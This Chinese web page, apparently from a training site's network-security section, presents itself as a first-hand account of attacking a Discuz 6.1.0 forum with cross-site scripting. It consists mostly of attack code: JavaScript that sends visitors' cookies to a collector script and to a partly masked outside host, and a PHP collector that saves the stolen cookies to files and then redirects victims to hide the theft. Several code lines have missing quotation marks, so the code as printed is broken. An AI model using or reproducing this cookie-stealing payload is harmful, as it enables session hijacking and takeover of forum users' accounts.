软件开发培训班 >> 网络技术 >> 网络安全
利用XSS渗透DISCUZ 6.1.0实战 |
|
本文标签:XSS,DISCUZ 网上关于XSS入侵网站的例子很多,但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程
论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽) var img = new Image();
img.src = get_cookie.php?var= + encodeURI(document.cookie);
**********************************************************************************************
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script> **********************************************************************************************
************************************************************************************
<?php if (isset($_GET[var])) { file_put_contents(./cookie/.time()..txt, urldecode($_GET[var])); } ?> <script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //转移页面隐蔽上面记录cookie的操作 ************************************************************************************
|